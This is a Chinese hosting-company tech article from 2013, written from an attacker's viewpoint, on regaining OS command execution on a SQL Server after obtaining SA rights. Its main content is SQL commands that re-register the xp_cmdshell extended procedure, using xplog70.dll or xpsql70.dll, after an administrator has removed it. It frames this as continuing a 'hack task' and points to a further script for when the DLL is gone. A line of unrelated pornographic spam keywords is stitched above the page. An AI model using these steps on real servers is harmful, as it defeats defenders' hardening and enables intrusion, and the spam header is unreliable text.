亚洲韩日午夜视频,欧美日韩在线精品一区二区三区,韩国超清无码一区二区三区,亚洲国产成人影院播放,久草新在线,在线看片AV色

您好,歡迎來到思海網絡,我們將竭誠為您提供優質的服務! 誠征網絡推廣 | 網站備案 | 幫助中心 | 軟件下載 | 購買流程 | 付款方式 | 聯系我們 [ 會員登錄/注冊 ]
促銷推廣
客服中心
業務咨詢
有事點擊這里…  531199185
有事點擊這里…  61352289
點擊這里給我發消息  81721488
有事點擊這里…  376585780
有事點擊這里…  872642803
有事點擊這里…  459248018
有事點擊這里…  61352288
有事點擊這里…  380791050
技術支持
有事點擊這里…  714236853
有事點擊這里…  719304487
有事點擊這里…  1208894568
有事點擊這里…  61352289
在線客服
有事點擊這里…  531199185
有事點擊這里…  61352288
有事點擊這里…  983054746
有事點擊這里…  893984210
當前位置:首頁 >> 技術文章 >> 文章瀏覽
技術文章

SQL Server SA權限總結

添加時間:2013-3-18 17:25:22  添加: 思海網絡 

前提需要工具:SQL Query Analyzer和SqlExec Sunx Version

第一部分:
有關去掉xp_cmdshell來保護系統的分析總結:
首先知道一下語句:
1.去掉xp_cmdshell擴展過程的方法是使用如下語句:
Code:
if exists (select * from dbo.sysobjects where id=object_id(N'[dbo].[xpcmdshell]') and OBJECTPROPERTY(id,N'IsExtendedProc')=1)
exec sp_dropextendedproc N'[dbo].[xp_cmdshell]'


2.添加xp_cmdshell擴展過程的方法是使用如下語句:
Code:
sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'


現在看看現象:
我們在取得SA權限后遠程用Sqlexec執行cmd命令,出現提示SQL_ERROR,那么很可能是去掉了xp_cmdshell。

現在來看看被去掉xp_cmdshell后恢復的兩種方法:
方法一、使用SQL Query Analyzer連接對方后直接寫入,挺方便
Code:
sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'


方法二、使用SqlExec Sunx Version
首先在SqlExec Sunx Version的Format選項里填上%s,在CMD選項里輸入
Code:
sp_addextendedproc 'xp_cmdshell','xpsql70.dll'

或者對Sql2000情況下使用
Code:
sp_addextendedproc 'xp_cmdshell','xplog70.dll'


另外使用SqlExec Sunx Version來去除xp_cmdshell的方法
和加的時候選擇條件一樣,然后輸入
Code:
sp_dropextendedproc 'xp_cmdshell'

就可以了

第二部分:
假如對方已經把xplog70.dll刪除或者改了名,我們來用下面的方法繼續我們的hack任務:
當出現如下現象暗示代表很有可能是xplog70.dll刪除或者改了名。
在查詢分析器中寫入
Code:
sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'

提示
數據庫中已存在名為'xp_cmdshell'的對象

那么我們如何恢復呢?
其實按照高手lcx提供的方法,我們可以通過使用查詢分析器中寫腳本來實現。
具體腳本源代碼請點擊連接獲得。

關鍵字:SQL Server、查詢分析器

分享到:

頂部 】 【 關閉
版權所有:佛山思海電腦網絡有限公司 ©1998-2024 All Rights Reserved.
聯系電話:(0757)22630313、22633833
中華人民共和國增值電信業務經營許可證: 粵B1.B2-20030321 備案號:粵B2-20030321-1
網站公安備案編號:44060602000007 交互式欄目專項備案編號:200303DD003  
察察 工商 網安 舉報有獎  警警  手機打開網站